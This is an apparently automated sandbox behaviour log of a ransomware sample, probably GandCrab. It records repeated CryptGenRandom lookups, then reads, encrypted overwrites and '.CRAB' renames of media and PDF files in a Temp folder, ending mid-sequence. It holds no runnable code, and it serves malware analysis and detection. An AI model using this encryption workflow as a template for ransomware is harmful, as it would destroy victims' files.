| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf.CRAB |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-ZZr9xYkqr28kj4Ewly.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\0rGnGm QreoWsur9e.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1dIAUE6JjxOcRnUgYL.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4, size = 1048576, size_out = 25696 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4, size = 25696 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4.CRAB |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4, size = 1048576, size_out = 99451 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4, size = 99456 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4.CRAB |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2nz3uSwqyVXWxqCOCF18.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf, size = 1048576, size_out = 90546 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf, size = 90560 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf.CRAB |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dBLEEVc8Nl3ui3b.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif, size = 1048576, size_out = 84150 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif, size = 84160 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif.CRAB |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav, size = 1048576, size_out = 54015 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav, size = 54016 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav.CRAB |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\F-PsEooiB7-oXDbtz1id.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fAfwVeyGLAK7P93Obz3Y.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg, size = 1048576, size_out = 94994 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg, size = 95008 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg.CRAB |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hLFQVM89GDd j6TcCek.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv, size = 1048576, size_out = 29283 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv, size = 29296 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv.CRAB |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a, size = 1048576, size_out = 94689 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a, size = 94704 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif, size = 1048576, size_out = 61897 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif, size = 61904 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mLE9mf-BdFdOibSg9l.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
